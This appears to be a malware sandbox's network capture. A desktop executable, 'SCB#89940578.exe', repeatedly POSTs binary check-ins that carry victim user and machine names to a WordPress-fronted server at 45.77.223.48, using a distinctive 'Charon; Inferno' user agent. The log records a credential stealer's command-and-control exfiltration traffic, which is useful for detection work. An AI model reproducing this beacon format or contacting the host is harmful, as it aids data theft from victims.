Apr 26, 2024 04:43:03.964334011 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:03.964476109 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:03.964519024 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:03.964731932 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:03.964745998 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49783	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:04.288589954 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:04.478672028 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:05.382873058 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:04 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:05.382921934 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 26, 2024 04:43:05.383610964 CEST	12	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 Data Ascii: lang="en-US"
Apr 26, 2024 04:43:05.383722067 CEST	25	IN	Data Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: ><head><meta charset="
Apr 26, 2024 04:43:05.384151936 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 26, 2024 04:43:05.384450912 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 26, 2024 04:43:05.393333912 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:05.393635988 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:05.393723011 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:05.572804928 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49784	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:05.708324909 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:05.896349907 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:06.778214931 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:05 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:06.778306007 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:06.778343916 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:06.787729025 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:06.788065910 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:06.788135052 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:06.788193941 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:06.788324118 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:06.788366079 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:06.788446903 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49785	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:07.513137102 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:07.701816082 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:08.631318092 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:07 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:08.631377935 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:08.631414890 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:08.645730019 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:08.646087885 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:08.646128893 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:08.646163940 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:08.646353006 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:08.646393061 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:08.646560907 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49786	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:08.959356070 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:09.153456926 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:10.088924885 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:09 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:10.088985920 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 26, 2024 04:43:10.089072943 CEST	12	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 Data Ascii: lang="en-US"
Apr 26, 2024 04:43:10.089241982 CEST	25	IN	Data Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: ><head><meta charset="
Apr 26, 2024 04:43:10.089793921 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 26, 2024 04:43:10.089884996 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 26, 2024 04:43:10.089925051 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:10.098485947 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:10.098547935 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:10.098587990 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49787	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:10.461205006 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:10.652117968 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:11.509917974 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:10 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:11.509979963 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:11.518042088 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:11.518213987 CEST	166	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:11.518341064 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:11.518484116 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:11.518527985 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:11.518567085 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
